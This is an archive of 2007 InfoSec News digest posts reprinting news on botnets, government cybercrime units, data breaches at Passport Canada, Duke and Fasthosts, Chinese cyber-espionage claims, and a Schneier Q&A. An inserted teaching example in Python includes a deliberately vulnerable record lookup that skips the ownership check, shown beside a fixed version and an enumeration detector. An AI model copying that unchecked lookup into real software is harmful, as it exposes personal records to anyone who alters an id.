Owen Walker's mother yesterday told the Herald that her son had the condition and that police investigating allegations that he is the mastermind of an international "bot-net" ring were aware of the fact.

Speaking at the family home in Whitianga, Shell Moxham-Whyte said she had "no idea" of the 18-year-old's alleged involvement in the ring, which the FBI believes has infected more than one million computers. She said that the family had been advised not to speak publicly and that her son was now staying with relatives elsewhere.

Mrs Moxham-Whyte said he and the family had come under intense pressure since it was revealed on Saturday that he was the cyber figure Akill whom the FBI considered "the ringleader of an international bot-net coding group".

A bot-net is a network of computers under the command and control of a criminal "bot-herder" who uses the network to commit cyber crimes or rents it to other cyber criminals.

It is understood that Walker is now staying in Auckland. Police have already interviewed the 18-year-old and plan to question him again once tests have been carried out on computers seized from his Whitianga home on Wednesday. They have been working on the case since February with the FBI.
Friends and employers have praised Walker as a brilliant computer programmer and the police national electronic crime laboratory manager, Maarten Kleintjes, said he was "very, very bright in terms of his ability to be able to produce that sort of code".

The teenager has lost his job as a programmer at Trio Software Development but company director Glenn Campbell told the Herald he believed Walker did not actively seek trouble or illegal activity.

Friends have described him as a loner and said he was bullied at Mercury Bay Area School before he left in Year 9. Mrs Moxham-Whyte said her son was an intelligent boy who had loved computers from a young age. He had done correspondence school after he left Mercury Bay.

Asked if she knew whether he had been profiting from involvement in a criminal bot-net, she said, "I can't say any more".

She confirmed that her son's surname was Walker, after the Weekend Herald was told it was Wilson. Owen is also known by "Snow Whyte" and "Snow Walker".

From alerts at infosecnews.org Tue Dec 4 02:19:50 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Cybercrime agency faces cuts as computer raid threats grow
Message-ID:

http://business.timesonline.co.uk/tol/business/industry_sectors/technology/article2994807.ece

By Rhys Blakely and Sean O'Neill
The Times
December 4, 2007

Staff cuts at the government agency that tackles cybercrime will leave British businesses vulnerable to attack from criminals and industrial espionage, experts say.

It has emerged that the Serious Organised Crime Agency (Soca), formed last year, will have to shed up to 400 staff when the Home Office announces its policing budget this week.

The Government is also being criticised for last year's merging of the National Hi-Tech Crime Unit (NHTCU), the police division formed in 2001 to deal with cybercrime, with Soca.
The move, which experts say lessened Britain's defences, went ahead despite evidence that web-based threats to companies were escalating.

Research released yesterday by Finjan, a web security company, highlighted an increased volume of cyber attacks on British companies from China. In particular, Finjan investigated an attack that used zero-day exploits - malicious software for which there are no security patches - that was designed to steal confidential information. It said that it had traced one of the sources of the attacks to a website that belongs to a Chinese government office.

On Saturday, The Times disclosed that the Director-General of MI5 had written to businessmen with a warning that they were being attacked by Chinese cyberspies.

Soca was hailed as Britain's answer to the FBI when it was launched last year by Tony Blair. However, it is expected to lose between 200 and 400 of its 4,400 staff.

Ian Brown, of Oxford University, a cyber-espionage expert, said that British businesses were more vulnerable than they need to be because of the merger and planned job cuts. "It is apparent now to many people that the merger . . . was a mistake," he said.

Business figures claim that the merged group is excessively secretive and have criticised it for not producing results.

Soca took over the functions of the National Crime Squad, the National Criminal Intelligence Service and NHTCU, as well as much of the work carried out by HM Customs law enforcement division. Its priority areas are drugs and fraud, but it is understood that the Home Office wants the agency to concentrate more on human-trafficking. Critics say that leaves cybercrime and web-based industrial espionage too far down the agenda.

The Metropolitan Police wants to establish a new cybercrime unit.
From alerts at infosecnews.org Wed Dec 5 00:20:01 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] FBI Cracks Down (Again) on Zombie Computer Armies
Message-ID:

Forwarded from: Dude VanWinkle

On Nov 30, 2007 4:14 AM, InfoSec News wrote:
> http://blog.wired.com/27bstroke6/2007/11/fbi-cracks-down.html
>
> By Ryan Singel
> Wired.com - Threat Level
> November 29, 2007
>
> The FBI announced Thursday it had indicted or successfully prosecuted
> eight individuals in a crack down on black hat hackers who use armies
> of zombie computers to commit financial fraud, attack web sites with
> floods of traffic and send spam. The crimes at issue involved more
> than $20 million in losses, according to the FBI

Once again: Taking down the army of a botmaster of millions without disabling the botnet just makes sure the treasures of bot-armies past will be handed down to the next script kiddie in line.

Even though the first attempt at this was bungled by a child not experienced in matters failed, I think it's worth another shot to send an "update your security and uninstall" final release before just leaving these willing combatants to another "dick-tater", as long as the software the FBI/NSA/SGC is audited by the open sores community..

-JP

From alerts at infosecnews.org Wed Dec 5 00:20:20 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Passport applicant finds massive privacy breach
Message-ID:

http://www.theglobeandmail.com/servlet/story/RTGAM.20071204.wpassport1204/BNStory/National/home

By Kenyon Wallace
Globe and Mail
December 4, 2007

A security flaw in Passport Canada's website has allowed easy access to the personal information - including social insurance numbers, dates of birth and driver's licence numbers - of people applying for new passports.

The breach was discovered last week by an Ontario man completing his own passport application.
He found he could easily view the applications of others by altering one character in the Internet address displayed by his Web browser.

"I was expecting the site to tell me that I couldn't do that," said Jamie Laning of Huntsville. "I'm just curious about these things so I tried it, and boom, there was somebody else's name and somebody else's data."

That data included social insurance numbers, driver's licence numbers and addresses. Also available were home and business phone numbers, a federal ID card number and even a firearms licence number.

"This is exactly how identity theft happens," said Carlisle Adams, an Internet data security expert and professor at the University of Ottawa. "If you want to take out a mortgage, for example, this is the type of information the bank is going to ask for to make sure you're really the person you're claiming to be. Then all of a sudden there's a mortgage in someone else's name."

Mr. Laning, 47, an IT worker at Algonquin Automotive, informed Passport Canada of the breach last week and the passport application site was suspended through yesterday morning.

Passport Canada spokesman Fabien Lengelle acknowledged that a security breach occurred but said that it was repaired on Friday. Yesterday's closing of the website was caused by "problems of a different nature," he said.

"We've probed this issue today very thoroughly," Mr. Lengelle said. "This incident is an isolated anomaly. The online passport system is still a very highly secure application."

But after the website resumed operation yesterday afternoon, a few keystrokes sufficed to reveal some of the personal information of passport applicants, including names, addresses and numbers for references and emergency contacts.

"That's a concern because obviously there's a weakness in their system that exposes valuable personal information to viewing by people," said Colin McKay, a spokesman for the office of the federal Privacy Commissioner of Canada.
"It's always a concern for us when agencies don't take all the security measures they can, especially an agency like Passport Canada that deals with basic documents."

Jason Marsden, a Brampton resident whose social insurance and driver's licence numbers were accessed by Mr. Laning, said he was "totally surprised" to learn that his personal information was so readily available.

"If you read the disclaimer on the website, it's supposed to use high-tech security," Mr. Marsden said in an interview. "You'd think it wouldn't be that bloody simple."

The Passport Canada website states the federal agency is "committed to respecting the privacy of individuals who visit our Web site."

The security breach follows two significant events concerning personal information. On Nov. 21, Justice Minister Rob Nicholson introduced legislation making it an offence to obtain, possess or traffic in people's identity information for the purposes of committing a crime. Just two days earlier, Britain's tax and customs service announced it had lost disks containing banking and personal data of 25 million people.

Canadian law does not require organizations to disclose when they've suffered security breaches. In the United States the majority of states have enacted legislation requiring organizations to disclose security breaches within a specified period of time.

"I think it's very clear that a strong, mandatory security-breach law is long overdue in this country and it's cases like these that highlight it," said Michael Geist, a law professor at the University of Ottawa.

"The reality is, even with the resources and the best security people, you're only as good as your weakest link," Prof. Geist said. "One mistake can result in significant security breaches that can put huge amounts of personal information at risk."
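The flaw described in the Passport Canada story, an application id taken from the URL and served without checking who is asking, is the pattern now called insecure direct object reference. The following is an added example written for this digest, not Passport Canada's code: it models the flaw against a constructed in-memory store, shows the hardened lookup beside it, and runs a simple enumeration check over constructed access-log lines. All function and data names are hypothetical.

```python
"""Object-level authorization for a record-lookup endpoint (added example).

Models the defect the article describes: a record id comes from the URL and
the vulnerable handler returns whatever record that id names, so changing one
character of the address yields another applicant's data. The hardened handler
binds the record to the authenticated session. A detector then flags sessions
that reached records they do not own, which is what the probing looks like in
a server log. Data and names are constructed for this example.
"""
from collections import defaultdict

# Constructed sample store: sequential ids, each application owned by one user.
# Sequential ids are guessable, but unguessable ids alone would not fix the
# defect; the server-side ownership check below is the actual control.
APPLICATIONS = {
    "1001": {"owner": "alice", "name": "A. Example", "phone": "555-0101"},
    "1002": {"owner": "bob",   "name": "B. Example", "phone": "555-0102"},
    "1003": {"owner": "carol", "name": "C. Example", "phone": "555-0103"},
    "1004": {"owner": "dave",  "name": "D. Example", "phone": "555-0104"},
}


def lookup_insecure(app_id, session_user):
    """Vulnerable form: trusts the id from the URL, never consults the session.

    session_user is accepted but ignored, which is exactly the bug.
    Returns (http_status, record_or_None).
    """
    record = APPLICATIONS.get(app_id)
    return (200, record) if record is not None else (404, None)


def lookup_secure(app_id, session_user):
    """Hardened form: a record is served only to the user who owns it.

    A record owned by someone else gets the same 404 as a missing id, so a
    caller cannot distinguish valid ids from invalid ones by probing.
    """
    record = APPLICATIONS.get(app_id)
    if record is None or record["owner"] != session_user:
        return (404, None)
    return (200, record)


def flag_enumeration(log_lines, threshold=3):
    """Flag users who fetched records belonging to other owners.

    log_lines: constructed "user app_id status" triples as the insecure
    endpoint would have logged them. A user is flagged once they have
    successfully read at least `threshold` distinct records they do not own.
    Returns the sorted list of flagged users.
    """
    foreign_hits = defaultdict(set)
    for line in log_lines:
        user, app_id, status = line.split()
        record = APPLICATIONS.get(app_id)
        if status == "200" and record is not None and record["owner"] != user:
            foreign_hits[user].add(app_id)
    return sorted(u for u, ids in foreign_hits.items() if len(ids) >= threshold)


# Constructed log: one session walking neighbouring ids, one legitimate read.
SAMPLE_LOG = [
    "alice 1001 200",
    "alice 1002 200",
    "alice 1003 200",
    "alice 1004 200",
    "bob 1002 200",
]

if __name__ == "__main__":
    print("insecure, alice asks for 1002:", lookup_insecure("1002", "alice"))
    print("secure,   alice asks for 1002:", lookup_secure("1002", "alice"))
    print("secure,   bob asks for 1002:  ", lookup_secure("1002", "bob"))
    print("flagged sessions:", flag_enumeration(SAMPLE_LOG))
```

The same ownership check belongs on every handler that loads a record by client-supplied id, including status pages and download links, not only the main lookup.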
From alerts at infosecnews.org Wed Dec 5 00:20:37 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Mashups, SAAS Present Security Risks
Message-ID:

http://www.eweek.com/article2/0,1895,2227704,00.asp

By Darryl K. Taft
eWeek.com
December 4, 2007

BOSTON -- The rise of mashups and similar technologies has given developers a way to build simple applications, but they're also opening up a new world of security issues.

The risks involved with mashups and SAAS (software as a service) come because of the amount of sensitive data that can be exposed on the Internet. However, Jeremy Burton, CEO of Serena Software, which released its enterprise mashup platform Dec. 3, said the benefits of the technologies can outweigh the risks.

"There are definitely security risks involved when exposing any URL on the Internet which contains confidential data behind it," Burton said at the XML 2007 conference here Dec. 3. "But the productivity of mashups and economics of SAAS are so compelling that enterprises will take steps to manage the risk and reap the benefits. A trip in a jet airliner has a thousand times more risk than a horse and cart but amazingly everybody still uses it."

Burton spoke after a panel discussion at the show regarding the future of XML on the Web. Mashups rely on Web services to work, as they are combinations of various services. Web services are typically XML-based, and HTML is the language needed to design Web pages, upon which mashups reside.

Rene Bonvanie, senior vice president of worldwide marketing for partners and online services at Serena, said that with mashups, "there are multiple layers at which security can be instrumented - first of all, at the source systems; second at the SOA [service-oriented architecture]/middleware architecture level; and third at the mashup platform level."

There's no inherent security in SAAS, said Ron Schmelzer, an analyst with ZapThink.
"You have to explicitly design that in," he said. "And by explicit, that means you have to design authentication and authorization into the way that the service responds to consumers. Furthermore, you have to deal with a new breed of denial-of-service attack that can target service dependencies."

Mashups, by their nature as a composition of services, don't introduce new security issues, Schmelzer said. "The security issue in composition is the problem of security context in which you have to deal with the fact that composing different systems might mean trying to span different identity domains, which is a significant problem for companies that have not made a prior investment in identity management systems," he said.

That said, the security issue is not a fatal flaw for SAAS, mashups and SOA, Schmelzer said. "It just needs to be addressed," he said. "Properly designed SOA, SAAS or mashups can be every bit as secure as any other enterprise application system, which means [they can be] as good as the architects."

Douglas Crockford, a senior JavaScript architect at Yahoo who is known for discovering the JavaScript Object Notation, said there's been nothing really new done to HTML since 1999, which has led to security problems and security risks down the line for technologies such as mashups.

"We've been so distracted by XML that HTML has not gotten the attention it needs," said Crockford, who was on the panel at the show.

Moreover, he said, "mashups are interesting but, unfortunately, because of security problems, they're just too dangerous. We have to address the security problems of the platform and get them right. Mashups allow for taking data from several sources. The problem we have is there's no way of protecting the various agents from each other."

In addition, an acquiring server can't know if it is getting the right thing, he said. A vicious script could get "full access to the screen and can ask anything of the user, including their password.
It's inherently dangerous."

Michael Day, founder of YesLogic and the architect of the Prince formatter, said XML does have a future on the Web, if only as a server technology. XML seems to have gone the way of other technologies, such as Java, that started out as client-side technologies and ended up in the server realm, Day said. "XML is still a vital part of the server infrastructure in many systems," he said.

Crockford said XML will continue to be vital because "once something gets into the enterprise, it can take generations to get it out. You can still buy a COBOL compiler. XML is clearly trending down; it is not going to replace HTML on the Web."

Michael Sperberg-McQueen, a member of the technical staff at the World Wide Web Consortium and one of the original editors of XML 1.0, also said XML has a future on the Web.

"There were 200 or so people involved in the formation of XML," Sperberg-McQueen said. "One goal was very simple; I wanted to be able to write things in descriptive markup using a vocabulary I was familiar with."

Moreover, "we won," Sperberg-McQueen said. "Every major browser supports the display of XML and client-side XSLT [Extensible Stylesheet Language Transformations]. XML will die when you rip it out of my cold, dead hands."

From alerts at infosecnews.org Wed Dec 5 00:20:52 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] China hits back at 'slanderous and prejudiced' alert over cyber spies
Message-ID:

http://www.timesonline.co.uk/tol/news/world/asia/article3000697.ece

By Jane Macartney in Beijing
The Times
December 5, 2007

China issued a furious response yesterday to a report in The Times that Chinese agencies were spying on British companies via the internet.
The report on Saturday said that the Director-General of MI5 had sent letters to 300 executives and security chiefs at banks, accounting and legal firms warning them that Chinese state agencies were hacking into their systems and trying to steal confidential information.

A Chinese Foreign Ministry spokesman said yesterday: "The Chinese Government has always opposed any internet crimes, including hacking which is an international problem." Qin Gang added: "We express strong dissatisfaction. It is a very irresponsible act."

China has lodged a formal protest, claiming that the report was "slanderous and prejudiced" and ignored the political, economic and social progress made by the country. It also alleged that the report was an attempt to put obstacles in the way of improved ties between Britain and China.

Gordon Brown is expected to make an official visit to Beijing in January. There was no indication that the report would result in those plans being delayed.

The Times reported that the letter from Jonathan Evans, the head of MI5, had told recipients how to identify Chinese Trojans - e-mails carrying software designed to hack into a computer network and feed back confidential data. People who had seen the letter told The Times that the security forces believed companies doing business in China were under particular threat from hackers.

The hackers are thought to include specialists with links to the People's Liberation Army (PLA). Computer experts have also accused hackers connected to the Chinese military of carrying out cyber attacks on the Pentagon, the British Parliament and the German Chancellery.

Analysts who monitor the activities of the highly secretive PLA said that the cyber spies were careful to cover their tracks to conceal any links to the Chinese authorities, particularly the military. Hackers are usually based outside China in Russia, Central Asia and in Europe and are not directly tied to the PLA but are manipulated or managed through other agencies.
Andrew Yang, the secretary-general of the Taiwan-based Chinese Council of Advanced Policy Studies and an expert on the PLA, told The Times: "Information warfare in China is mostly conducted by the private sector so it is difficult to identify who is really behind this." He described the methods as highly decentralised but employing systems to ensure that any information garnered got back to state security organisations in China.

For its part, China has not only denied that it is engaged in any cyber crime but also claimed that its own networks had also been targeted.

From alerts at infosecnews.org Wed Dec 5 00:21:07 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Hackers may have accessed Duke information
Message-ID:

http://www.newsobserver.com/news/story/811419.html

By Marlon A. Walker
staff writer
Dec 04, 2007

DURHAM - The Social Security numbers of about 1,400 prospective Duke Law School students may have been accessed by a hacker to the school's Web site, officials said Tuesday.

An editor working on the site Thursday afternoon found several links that were not authorized, Duke Law School spokeswoman Melinda Vaughn said Tuesday evening. She said the site was immediately taken offline and an investigation into how the links were put on the site commenced.

Vaughn said two databases - one for students who have requested information on the law school and one for students who have already submitted applications - were available for viewing by hackers. The database for interested students included the social security numbers of about 1,400 students. The issues for applicants were e-mail addresses and user-generated passwords used to check their application status to the law school. About 1,800 people were registered on the second database, she said.

"We were concerned that some of those people might have used the same passwords that they used on other sites," Vaughn said.
In an e-mail to the affected students, associate dean of admissions William J. Hoye alluded to the fact that the information may not have been breached.

"We have no evidence that the intruders actually downloaded or acquired any of this information," Hoye said in the e-mail, sent Tuesday. "Nonetheless, we know they had the opportunity and the tools to do so."

The school is telling those affected to monitor their credit as a precaution. A phone number and e-mail address have also been set up for anyone to get answers to any questions regarding the breach.

Vaughn said personal information of two current students was possibly compromised in the site breach. Those two, she said, were among the prospective students who had generated passwords to check their application status.

Tuesday evening, a note on the Duke Law School Web site said some of its content continued to be unavailable for access. Vaughn said she expected the site to be back online as soon as Tuesday night.

"We're certainly continuing the investigation," she said. "We still don't know what happened and who did it."

From alerts at infosecnews.org Wed Dec 5 00:21:25 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] MI5 calls in KPMG to warn of espionage
Message-ID:

http://www.telegraph.co.uk/money/main.jhtml?xml=/money/2007/12/05/cnmi5105.xml

By Russell Hotten
05/12/2007

The security service MI5 has asked consultants KPMG to lead a group to monitor cases of industrial espionage and co-ordinate information between Britain's leading companies.

MI5 is increasingly concerned at attempts by foreign governments to hack into the computer systems of major firms, and last week accused China of trying to steal corporate secrets.

KPMG, which works closely with the GCHQ listening station, is creating a "risk management information exchange", with a team of security and IT experts to assess "threat levels" and warn of imminent dangers.
If a company discovers attempts to breach computer security through, say, viruses, the information can be passed to MI5 and other companies using the KPMG group.

Last week, the director-general of MI5, Jonathan Evans, sent confidential letters to 300 chief executives and security heads at major companies warning about "electronic espionage" from "Chinese state organisations". It was later reported that Rolls-Royce and Royal Dutch Shell had faced attempts to breach their computer security systems.

The US and France have accused China of industrial espionage - which Beijing strongly denied. China has yet to respond to the MI5 claims.

Martin Jordan, principal adviser to KPMG on IT security, and head of the new group, said: "The intention is to give an early warning when threats appear. The information will be disseminated through a small group of people, but it will hopefully give MI5 a bigger overview of what is going on."

From alerts at infosecnews.org Wed Dec 5 00:21:39 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Securing info systems could cost $28 billion, budget office says
Message-ID:

http://www.fcw.com/online/news/150986-1.html

By Matthew Weigelt
FCW.com
December 4, 2007

The Congressional Budget Office estimates that the E-Government Reauthorization Act could cost the government about $29 billion over a four-year period, mainly for securing agencies' information systems.

The Office of Management and Budget said agencies spent about $5.5 billion in fiscal 2006 to meet the Federal Information Security Management Act, according to a CBO cost estimate report released today about the reauthorization legislation. Continuing the same updates, FISMA requirements would consume $27.9 billion of the $29 billion that the legislation would cost the government between 2008 and 2012, which includes adjustments for anticipated inflation, according to CBO.
It also estimates that continuing current activities and starting new programs authorized by bill would make up the remaining $1.1 billion. But CBO believes agencies could save administrative costs through e-government as they collect information from the public and provide government services. CBO has no way to calculate how much, though, according to the report. The bill would authorize money for programs that improve how the government deploys services and accesses information. It also would centralize many agencies Internet-related activities. Specifically, it would authorize the General Services Administrations E-Government Fund for interagency projects and the Office of Personnel Managements IT personnel needs for the federal workforce. It would also authorize the National Institutes of Standards and Technologys research related to information security. The e-government authorization expired this year. The Senate Homeland Security and Governmental Affairs Committee approved the reauthorization act Nov. 14, but there is no House companion bill. CBO also released a cost estimate today for the Inspector General Reform Act, which the committee also approved Nov. 14. CBO estimates the bill would cost the government $83 million to implement. The reforms would make IG offices separate agencies, give them the same authority as the agencies they monitor and authorize them to submit their own annual budgets. Those provisions, among others, could cost about $53 million from 2008 to 2012, according to the report. The bill would establish an IG council to discuss areas of weakness in the IG community and investigate fraud allegations against IGs. CBO estimates that setting up the council would cost $25 million. Estimates for increasing salaries for IGs would cost $4 million, and semiannual reports to Congress would cost $1 million, according to CBO. 
From alerts at infosecnews.org Wed Dec 5 00:21:57 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Bruce Schneier Blazes Through Your Questions
Message-ID:

http://freakonomics.blogs.nytimes.com/2007/12/04/bruce-schneier-blazes-through-your-questions/

By Stephen J. Dubner
Freakonomics
December 4, 2007

Last week, we solicited your questions for Internet security guru Bruce Schneier. He responded in force, taking on nearly every question, and his answers are extraordinarily interesting, providing mandatory reading for anyone who uses a computer. He also plainly thinks like an economist: search below for "crime pays" to see his sober assessment of why it's better to earn a living as a security expert than as a computer criminal. Thanks to Bruce and to all of you for participating.

Here's a note that Bruce attached at the top of his answers:

Thank you all for your questions. In many cases, I've written longer essays on the topics you've asked about. In those cases, I've embedded the links into the necessarily short answers I've given here.

Q: Assuming we are both still here in 50 years, what do you believe will be the most incredible, fantastic, mind-blowing advance in computers/technology at that time?

A: Fifty years is a long time. In 1957, fifty years ago, there were fewer than 2,000 computers total, and they were essentially used to crunch numbers. They were huge, expensive, and unreliable; sometimes, they caught on fire. There was no word processing, no spreadsheets, no e-mail, and no Internet. Programs were written on punch cards or paper tape, and memory was measured in thousands of digits. IBM sold a disk drive that could hold almost 4.5 megabytes, but it was five-and-a-half feet tall by five feet deep and would just barely fit through a standard door.

Read the science fiction from back then, and you'd be amazed by what they got wrong. Sure, they predicted smaller and faster, but no one got the socialization right. No one predicted eBay, instant messages, or blogging.

Moore's Law predicts that in fifty years, computers will be a billion times more powerful than they are today. I don't think anyone has any idea of the fantastic emergent properties you get from a billion-times increase in computing power. (I recently wrote about what security would look like in ten years, and that was hard enough.) But I can guarantee that it will be incredible, fantastic, and mind-blowing.

Q: With regard to identity theft, do you see any alternatives to data being king? Do you see any alternative systems which will mean that just knowing enough about someone is not enough to commit a crime?

A: Yes. Identity theft is a problem for two reasons. One, personal identifying information is incredibly easy to get; and two, personal identifying information is incredibly easy to use. Most of our security measures have tried to solve the first problem. Instead, we need to solve the second problem. As long as it's easy to impersonate someone if you have his data, this sort of fraud will continue to be a major problem.

The basic answer is to stop relying on authenticating the person, and instead authenticate the transaction. Credit cards are a good example of this. Credit card companies spend almost no effort authenticating the person -- hardly anyone checks your signature, and you can use your card over the phone, where they can't even check if you're holding the card -- and spend all their effort authenticating the transaction. Of course it's more complicated than this; I wrote about it in more detail here and here.

Q: What's the next major identity verification system?

A: Identity verification will continue to be the hodge-podge of systems we have today. You're recognized by your face when you see someone you know; by your voice when you talk to someone you know. Open your wallet, and you'll see a variety of ID cards that identify you in various situations -- some by name and some anonymously. Your keys identify you as someone allowed in your house, your office, your car. I don't see this changing anytime soon, and I don't think it should. Distributed identity is much more secure than a single system. I wrote about this in my critique of REAL ID.

Q: If we can put a man on the moon, why in the world can't we design a computer that can cold boot nearly instantaneously? I know about hibernation, etc., but when I do have to reboot, I hate waiting those three or four minutes.

A: Of course we can; Amiga was a fast booting computer, and OpenBSD boxes boot in less than a minute. But the current crop of major operating systems just don't. This is an economics blog, so you tell me: why don't the computer companies compete on boot-speed?

Q: Considering the carelessness with which the government (state and federal) and commercial enterprises treat our confidential information, is it essentially a waste of effort for us as individuals to worry about securing our data?

A: Yes and no. More and more, your data isn't under your direct control. Your e-mail is at Google, Hotmail, or your local ISP. Online merchants like Amazon and eBay have records of what you buy, and what you choose to look at but not buy. Your credit card company has a detailed record of where you shop, and your phone company has a detailed record of who you talk to (your cell phone company also knows where you are). Add medical databases, government databases, and so on, and there's an awful lot of data about you out there. And data brokers like ChoicePoint and Acxiom collect all of this data and more, building up a surprisingly detailed picture on all Americans.

As you point out, one problem is that these commercial and government organizations don't take good care of our data. It's an economic problem: because these parties don't feel the pain when they lose our data, they have no incentive to secure it. I wrote about this two years ago, stating that if we want to fix the problem, we must make these organizations liable for their data losses.

Another problem is the law; our Fourth Amendment protections protect our data under our control -- which means in our homes, in our cars, and on our computers. We don't have nearly the same protection when we give our data to some other organization for use or safekeeping.

That being said, there's a lot you can do to secure your own data. I give a list here.

Q: How do you remember all of your passwords?

A: I can't. No one can; there are simply too many. But I have a few strategies. One, I choose the same password for all low-security applications. There are several Web sites where I pay for access, and I have the same password for all of them. Two, I write my passwords down. There's this rampant myth that you shouldn't write your passwords down. My advice is exactly the opposite. We already know how to secure small bits of paper. Write your passwords down on a small bit of paper, and put it with all of your other valuable small bits of paper: in your wallet. And three, I store my passwords in a program I designed called Password Safe. It's a small application -- Windows only, sorry -- that encrypts and secures all your passwords.

Here are two other resources: one concerning how to choose secure passwords (and how quickly passwords can be broken), and one on how lousy most passwords actually are.

[...]

From alerts at infosecnews.org Thu Dec 6 04:02:02 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Hackers force mass website closures
Message-ID:

http://technology.timesonline.co.uk/tol/news/tech_and_web/article3007298.ece

By Simon de Bruxelles
The Times
December 6, 2007

Hundreds of websites have been shut down temporarily by one of the largest web hosting companies in Britain after the personal details of customers were stolen by computer hackers.
The hackers managed to access the master database of Fasthosts for information, including addresses, bank details, e-mails and passwords. The action is expected to lose vital business for hundreds of small companies in the run-up to Christmas.

Fasthosts claimed that it had no option other than to perform an emergency shutdown after it discovered that the hackers had tried to use information gleaned from its servers. New passwords had to be sent out by post rather than e-mail to avoid the information being compromised again.

Fasthosts was founded by Andrew Michael when he was still at school in Cheltenham. Mr Michael, 27, sold the business, which sells domain names and space on computer servers, to a German firm.

The company discovered a network intrusion in October and recommended that users change their passwords. Last week, staff noticed unusual activity on some of its sites and closed down all those that had not yet changed their passwords, as well as some that had.

Among the companies affected by the shutdown was EU Reporter, a small, web-based business that makes money from downloads and web advertising. Chris White, the owner, said that his downloads went from 47,000 a week to nothing and subscribers assumed that he had gone out of business.

He said: "The loss of readership on my site is incredibly significant to my business. I've lost thousands of pounds and there are literally thousands more out there like me. I've got a pile of letters and e-mails from long-standing customers saying they're sorry we've gone bust. This has been a crime turned into a farce and I don't know if we'll survive."

Kohul Thiagarajah, another client of Fasthosts who manages bookings for taxi companies, said: "I had my clients screaming at me for not being able to access their e-mails or their bookings."

Barry Wise, who manages 100 sites, said: "This is worse than being hacked because I now just have to wait for the post. I can't call them because their phone lines are overwhelmed."

A spokesman for Fasthosts Internet Ltd said: "Last month Fasthosts wrote to all its customers to advise them that the company had discovered a network intrusion involving a Fasthosts server and, as a precautionary measure, recommended that all customers update their passwords. Fasthosts was made aware that a very small number of customers, who did not change their passwords, had experienced a compromise. As a result, Fasthosts implemented automatic password changes. We apologise to those customers affected for any inconvenience."

David Roberts, the chief executive of the Corporate IT Forum, which shares expertise among its companies, said: "This could well be the biggest internet attack of its kind. The criminals could theoretically have taken everything on the database."

Police are investigating the network intrusion.

From alerts at infosecnews.org Thu Dec 6 04:03:36 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Mobile Data a Moving Liability
Message-ID:

http://www.darkreading.com/document.asp?doc_id=140698

By Terry Sweeney
Dark Reading
December 5, 2007

SAN FRANCISCO -- By his own account, Tory Skyers lives on the edge -- the storage edge. He defines that place as the point in the enterprise network where any kind of mobile device contributes content to the SAN. This device menu runs the gamut from iPod, to Zune, PSP, Treo, Blackberry, Psion, laptop or desktop computer, USB flash drive, and external hard drive, to name a few.

He uses two incentives to get unthinking users to follow policy or stop doing dumb things. "Fear and money are great motivators," he told an audience here at the Storage Decisions conference this morning. "What is that data worth to you on your laptop, on your iPhone -- in monetary terms? What if you didn't have your contacts list saved?" said Skyers, senior systems engineer for Prudential Fox & Roach Realtors. That typically gets users thinking.

He cited a recent example of an executive who wanted to store his iTunes directory on the company server. "I showed him that it would cost $670 per user for every 14 days of storage for that iTunes volume," Skyers said. Factor in five other users at more than $1,300 a month and suddenly it gives users a more concrete incentive to set an example and enforce such acceptable use policies within their workgroups, he added.

IT should not be immune from enforcement, Skyers said. Consequently, when he wants to take a gander at jpegs of loved ones or work on a personal document, he plugs in the 8-Gbyte USB drive he keeps on his keychain and none of it gets backed up to company servers.

Skyers encouraged storage pros to do some social networking of their own. Reach out to the marketing department to help come up with catchy ways to get people to be smarter about what they save and how they use the Internet. If the legal department hasn't already thought it through, remind them that the Bank of America got fined millions of dollars daily for its inability to produce emails. Ask human resources to get involved to give the policy some teeth, whether it's a reprimand or something more draconian. "They enjoy that," Skyers said, to appreciative nods from the audience.

He also encouraged more intra-departmental discussion within IT. "How many times have you heard, 'I'm a security guy, I don't wanna look at your hard drive'?" he asked. Those are conversations that businesses of all sizes need to have to make sure artificial fiefdoms don't compromise the company.

IT can also step in and create sanctioned alternatives like memberships to P2P file-sharing services that operate legally. And they can get more proactive by deploying desktop management programs like Desktop Authority and Powerfuse, which limit users' ability to store outside permitted folders, and restrict executables like Google Search, Skyers said. Other controls, like SurfControl Mobile Filter, limit access to certain Websites and protocols when the user is outside the network or VPN, and prevent downloading unauthorized data content.

From alerts at infosecnews.org Thu Dec 6 04:03:50 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Phone phreaks spoof LSD-induced multiple homicide
Message-ID:

http://www.theregister.co.uk/2007/12/05/swat_conspiracy_guilty_pleas/

By Dan Goodin in San Francisco
The Register
5th December 2007

Three more individuals have admitted they participated in a series of phone phreak hoaxes that prompted raids by armed special weapons and tactic police teams on the homes of unsuspecting victims.

Jason Trowbridge, of Louisiana and Texas, and Chad Ward of Texas pleaded guilty to multiple felonies, including conspiracy, access device fraud and unauthorized access of a protected computer. Each faces maximum penalties of five years in prison, fines of $250,000 and costs for restitution.

As previously reported [1], Stuart Rosoff also pleaded guilty to charges in connection with the pranks, which over a course of almost five years snared more than 100 victims and resulted in as much as $250,000 in losses, according to court documents. Angela Roberson, who was charged alongside the trio, also entered a guilty plea but court documents did not elaborate.

A sentencing hearing for Trowbridge is scheduled for late February. Hearings for Ward and Roberson are scheduled for mid March.

